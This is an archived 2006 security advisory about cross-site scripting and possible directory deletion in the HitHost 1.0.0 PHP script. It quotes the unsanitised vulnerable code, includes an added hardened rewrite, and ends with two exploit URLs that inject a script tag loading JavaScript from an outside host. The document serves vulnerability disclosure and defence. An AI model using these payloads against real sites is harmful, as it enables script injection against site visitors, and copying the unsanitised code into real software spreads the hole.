Securityvulns SECURITYVULNS:DOC:11722
Mar 07, 2006 - 12:00 a.m.

hithost v1.0.0 xss and possible rmdir

-------- summary
software: HitHost
vendors website: http://daverave.64digits.com/index.php?page=hithost
versions: <= 1.0.0
class: remote
status: unpatched
exploit: available
solution: not available
discovered by: retard
risk level: medium

-------- description
hithost uses $_GET variables in crucial parts of its code, causing
xss vulnerabilities and possibly allowing users to rm dirs chmodded
to 0777

    in ./admin/deleteuser.php:

15 else
16 {
17 unlink("users/$deleteuser/password.php");
18 unlink("users/$deleteuser/counter.php");
19 rmdir("users/$deleteuser/");
20 echo "The user <b>$deleteuser</b> has been deleted";
21 }

    as you see, line 19 raises suspicion of the possibility of rming 0777 dirs.
    i've tried it on my personal server with no success; if someone knows
    of a way let me know.
    
    in ./admin/viewuser.php:

$viewuser = $_GET['user'];
include("users/$viewuser/counter.php");
echo "Username: <b>$viewuser</b><br><br>";
echo "Number of counter hits: $hits<br><br>";

    this code is self-explanatory: the script does not sanitise $_GET['user'],
    allowing users to easily shove xss into the variable.
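
Added example, not part of the original advisory and not HitHost's code: one way to harden both scripts, checking the user name against an allow-list before it reaches include(), unlink() or rmdir(), and HTML-encoding it on output. The users/ location, the name policy, the `user` parameter for deleteuser.php (taken from the advisory's URL) and the helper names are assumptions.

```php
<?php
// Added example, not HitHost's code. Assumes users/ sits beside this script and
// that users/<name>/counter.php sets $hits, as the advisory's excerpt implies.
const USERS_DIR = __DIR__ . '/users';

// Return $name only if it names a directory directly under USERS_DIR, else null.
function valid_user($name): ?string {
    // Assumed name policy: 1-32 letters, digits, underscore or hyphen.
    if (!is_string($name) || !preg_match('/\A[A-Za-z0-9_-]{1,32}\z/', $name)) {
        return null;                  // markup, "..", "/" and NUL never pass
    }
    $base = realpath(USERS_DIR);
    $dir  = realpath(USERS_DIR . '/' . $name);
    if ($base === false || $dir === false || !is_dir($dir) || dirname($dir) !== $base) {
        return null;                  // missing, or a symlink pointing elsewhere
    }
    return $name;
}

// Encode for an HTML text context so the value is displayed, never parsed.
function h(string $s): string {
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// viewuser.php: validate before include(), escape on output.
function view_user(array $query): string {
    $user = valid_user($query['user'] ?? null);
    if ($user === null) {
        return 'No such user';        // the rejected value is not echoed back
    }
    $hits = 0;
    include USERS_DIR . "/$user/counter.php";
    return 'Username: <b>' . h($user) . '</b><br><br>'
         . 'Number of counter hits: ' . (int) $hits . '<br><br>';
}

// deleteuser.php: the same check guards unlink() and rmdir().
function delete_user(array $query): string {
    $user = valid_user($query['user'] ?? null);
    if ($user === null) {
        return 'No such user';
    }
    $dir = USERS_DIR . "/$user";
    foreach (['password.php', 'counter.php'] as $f) {
        if (is_file("$dir/$f")) { unlink("$dir/$f"); }
    }
    return @rmdir($dir) ? 'The user <b>' . h($user) . '</b> has been deleted'
                        : 'Could not delete user';
}
// Constructed input: markup in the parameter is rejected, not reflected.
echo view_user(['user' => '<script src=//example.invalid/x.js></script>']), "\n";
```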

-------- exploit(s)
http://example.com/admin/deleteuser.php?user=<script%20src=http://notlegal.ws/xss.js></script>
http://example.com/admin/viewuser.php?hits=<script%20src=http://notlegal.ws/xss.js></script>

-------- credit
author(s): retard
email: [email protected]